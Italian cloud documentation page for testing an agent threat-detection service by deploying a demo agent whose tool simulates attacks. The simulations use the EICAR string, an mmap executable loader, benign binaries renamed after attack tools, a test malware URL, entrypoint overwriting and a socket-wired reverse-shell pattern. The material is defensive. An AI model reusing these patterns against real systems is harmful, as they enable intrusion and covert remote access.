Questa pagina spiega come verificare che Agent Platform Threat Detection funzioni attivando intenzionalmente i rilevatori e controllando i risultati. Agent Platform Threat Detection è un servizio integrato di Security Command Center.
Prima di iniziare
Per rilevare potenziali minacce agli agenti Agent Runtime, assicurati che il servizio di rilevamento delle minacce di Agent Platform sia abilitato in Security Command Center.
Configura l'ambiente
Per testare il rilevamento delle minacce di Agent Platform, configura un agente demo che simula attività dannose.
Crea un progetto e attiva la shell
Seleziona o crea un progetto Google Cloud da utilizzare per i test.
Per testare i rilevatori, puoi utilizzare la console Google Cloud e Cloud Shell.
Vai alla consoleGoogle Cloud .
Seleziona il progetto che utilizzerai per il test.
Fai clic su Attiva Cloud Shell.
Puoi anche eseguire le istruzioni di test da una shell locale.
Configura Agent Runtime
Se non hai mai utilizzato Agent Runtime in questo progetto, configura l'ambiente Agent Runtime prima di iniziare. Registra il nome del bucket di staging Cloud Storage che hai creato. Ti consigliamo inoltre di seguire la guida rapida di Agent Runtime per imparare a sviluppare e a eseguire il deployment di un agente con l'SDK Vertex AI.
Crea script per il test
Creerai diversi file che verranno utilizzati per il deployment di un nuovo agente per
i test. Utilizza un editor di testo, ad esempio nano.
Crea un nuovo file denominato
requirements.txtcon i seguenti contenuti.google-cloud-aiplatform[agent_engines] google-adk google-genai aiohttp cloudpickle pydanticCrea un nuovo file vuoto denominato
installation_scripts/install.sh. Alcuni test richiedono l'aggiunta di contenuti a questo file.Crea un nuovo file denominato
main.pycon i seguenti contenuti. Sostituisci le variabiliPROJECT_ID,LOCATIONeSTAGING_BUCKET. Il nome del bucket di staging deve includere il prefissogs://.import asyncio import os import subprocess import socket import vertexai from vertexai import Client, agent_engines from google.adk.agents import llm_agent from google.adk.sessions.in_memory_session_service import InMemorySessionService # Replace with your own project, location, and staging bucket. LOCATION = "LOCATION" PROJECT_ID = "PROJECT_ID" # Staging bucket must have gs:// prefix STAGING_BUCKET = "STAGING_BUCKET" client = Client(project=PROJECT_ID, location=LOCATION) def _run_command(args, **kwargs): output = f"Called {' '.join(args)}\n" try: res = subprocess.run(args, capture_output=True, text=True, **kwargs) if res.stdout: output += f"Result: {res.stdout.strip()}\n" if res.stderr: output += f"Error: {res.stderr.strip()}\n" except subprocess.TimeoutExpired: output += "Command timed out as expected." return output # Tool to simulate threats. The function body will be replaced for individual # detector tests. def threat_detection_test(): output = _run_command(["sleep", "60"]) output += _run_command(["echo", "this is a fake threat"]) output += _run_command(["sleep", "10"]) return output root_agent = llm_agent.Agent( model="gemini-2.5-flash", name="threat_detection_test_agent", description="Runs threat detection test.", instruction=""" You are an agent that runs a threat detection test using a fake malicious command. """, tools=[threat_detection_test], ) async def main(): vertexai.init( project=PROJECT_ID, location=LOCATION, staging_bucket=STAGING_BUCKET, ) app = agent_engines.AdkApp( agent=root_agent, session_service_builder=InMemorySessionService ) remote_agent = client.agent_engines.create( agent=app, config={ "display_name": "scc_threat_test_agent", "identity_type": vertexai.types.IdentityType.AGENT_IDENTITY, "requirements": [ "google-cloud-aiplatform[agent_engines,adk]", "cloudpickle", "pydantic", ], "staging_bucket": STAGING_BUCKET, "extra_packages": [ "installation_scripts/install.sh", ], }, ) print("Deployed agent: ", remote_agent.api_resource.name) try: async for event in remote_agent.async_stream_query( user_id="threat_detection_tester", message="Run the threat detection test", ): print(event) finally: client.agent_engines.delete(name=remote_agent.api_resource.name, force=True) if __name__ == "__main__": asyncio.run(main())
Configurare l'ambiente virtuale
Crea e attiva un ambiente virtuale Python.
python3 -m venv env source env/bin/activateInstalla le dipendenze necessarie nell'ambiente virtuale.
pip install -r requirements.txt
Testa lo script
Esegui lo script dall'interno dell'ambiente virtuale con python3 main.py.
L'esecuzione di questo comando richiederà diversi minuti per creare, eseguire il deployment ed eseguire l'agente di test.
Lo script restituisce il nome della risorsa dell'agente di cui è stato eseguito il deployment e alcuni oggetti JSON, tra cui una risposta LLM e altri metadati. Se in questa fase si verificano errori di autorizzazione o di deployment, consulta la risoluzione dei problemi per i passaggi successivi.
Rilevatori di test
Per testare i rilevatori di Agent Platform Threat Detection, sostituisci il codice nella funzione threat_detection_test con un codice che simula un attacco. L'esecuzione dello script può richiedere molto tempo
per il deployment e l'interrogazione dell'agente. Per velocizzare i test, puoi combinare i contenuti di
diverse di queste funzioni.
Esecuzione: file binario aggiuntivo dannoso eseguito
Sostituisci la funzione threat_detection_test nello script per il test, quindi esegui lo script per il test.
def threat_detection_test():
output = _run_command(["sleep", "60"])
eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
output += _run_command(["touch", "/tmp/test_mal_file"])
with open("/tmp/test_mal_file", "w") as f:
f.write(eicar)
output += _run_command(["chmod", "700", "/tmp/test_mal_file"])
output += _run_command(["sh", "-c", "/tmp/test_mal_file"])
output += _run_command(["sleep", "10"])
return output
Esecuzione: libreria dannosa aggiuntiva caricata
Sostituisci la funzione threat_detection_test nello script per il test, quindi esegui lo script per il test. Potresti ricevere un errore dall'SDK Vertex AI relativo all'analisi della risposta, ma il risultato viene comunque generato.
def threat_detection_test():
output = _run_command(["sleep", "60"])
eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
with open("/tmp/test_mal_lib", "w") as f:
f.write(eicar)
with open("/tmp/loader.c", "w") as f:
f.write("""
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>
#include <stdlib.h>
int main(int argc, char *argv[]) {
int fd = open(argv[1], O_RDONLY);
struct stat sb;
fstat(fd, &sb);
void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0);
write(1, addr, sb.st_size);
munmap(addr, sb.st_size);
close(fd);
return 0;
}
""")
output += _run_command(["gcc", "/tmp/loader.c", "-o", "/tmp/loader"])
output += _run_command(["/tmp/loader", "/tmp/test_mal_lib"])
output += _run_command(["sleep", "10"])
return output
Esecuzione: container escape
Sostituisci la funzione threat_detection_test nello script per il test, quindi esegui lo script per il test.
def threat_detection_test():
output = _run_command(["sleep", "60"])
output += _run_command(["cp", "/bin/ls", "/tmp/botb-linux-amd64"])
output += _run_command(["chmod", "700", "/tmp/botb-linux-amd64"])
output += _run_command(["/tmp/botb-linux-amd64", "-autopwn"])
output += _run_command(["sleep", "10"])
return output
Esecuzione: esecuzione dello strumento di attacco Kubernetes
Sostituisci la funzione threat_detection_test nello script per il test, quindi esegui lo script per il test.
def threat_detection_test():
output = _run_command(["sleep", "60"])
output += _run_command(["cp", "/bin/ls", "/tmp/amicontained"])
output += _run_command(["/tmp/amicontained"])
output += _run_command(["sleep", "10"])
return output
Esecuzione: esecuzione dello strumento di ricognizione locale
Sostituisci la funzione threat_detection_test nello script per il test, quindi esegui lo script per il test.
def threat_detection_test():
output = _run_command(["sleep", "60"])
output += _run_command(["cp", "/bin/ls", "/tmp/linenum.sh"])
output += _run_command(["/tmp/linenum.sh"])
output += _run_command(["sleep", "10"])
return output
Esecuzione: File binario dannoso modificato eseguito
Replace the `threat_detection_test` function in the test script, and then run the
test script.
```python
def threat_detection_test():
eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
output = _run_command(["sleep", "60"])
output += _run_command(["chmod", "-R", "777", "/code"])
with open("/code/entrypoint.sh", "w") as f:
f.write(eicar)
output += _run_command(["chmod", "700", "/code/entrypoint.sh"]) output += _run_command(["sh", "-c", "/code/entrypoint.sh"]) output += _run_command(["sleep", "10"]) return output ```
Esecuzione: libreria dannosa modificata caricata
Sostituisci la funzione threat_detection_test nello script per il test, quindi esegui lo script per il test.
def threat_detection_test():
eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
output = _run_command(["sleep", "60"])
output += _run_command(["chmod", "-R", "777", "/code"])
with open("/code/entrypoint.sh", "w") as f:
f.write(eicar)
with open("/tmp/loader.c", "w") as f:
f.write("""
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>
#include <stdlib.h>
int main(int argc, char *argv[]) {
int fd = open(argv[1], O_RDONLY);
struct stat sb;
fstat(fd, &sb);
void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0);
write(1, addr, sb.st_size);
munmap(addr, sb.st_size);
close(fd);
return 0;
}
""")
output += _run_command(["gcc", "/tmp/loader.c", "-o", "/tmp/loader"])
output += _run_command(["/tmp/loader", "/code/entrypoint.sh"])
output += _run_command(["sleep", "10"])
return output
Rilevato URL dannoso
Aggiorna il file installation_scripts/install.sh con i seguenti contenuti.
#!/bin/bash
apt-get install -y curl --no-install-recommends
Sostituisci la funzione threat_detection_test nello script per il test, quindi esegui lo script per il test.
def threat_detection_test():
url = "https://testsafebrowsing.appspot.com/s/malware.html"
output = _run_command(["sleep", "60"])
output += _run_command(["curl", url])
output += _run_command(["sleep", "10"])
return output
Shell inversa
Sostituisci la funzione threat_detection_test nello script per il test, quindi esegui lo script per il test.
def threat_detection_test():
output = _run_command(["sleep", "60"])
output += _run_command(["cp", "/bin/echo", "/tmp/sh"])
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("8.8.8.8", 53))
subprocess.run(["/tmp/sh"], stdin=s, stdout=s, stderr=s, timeout=5)
output += _run_command(["sleep", "10"])
return output
Passaggi successivi
- Scopri di più su Agent Platform Threat Detection.
- Scopri come utilizzare Agent Platform Threat Detection.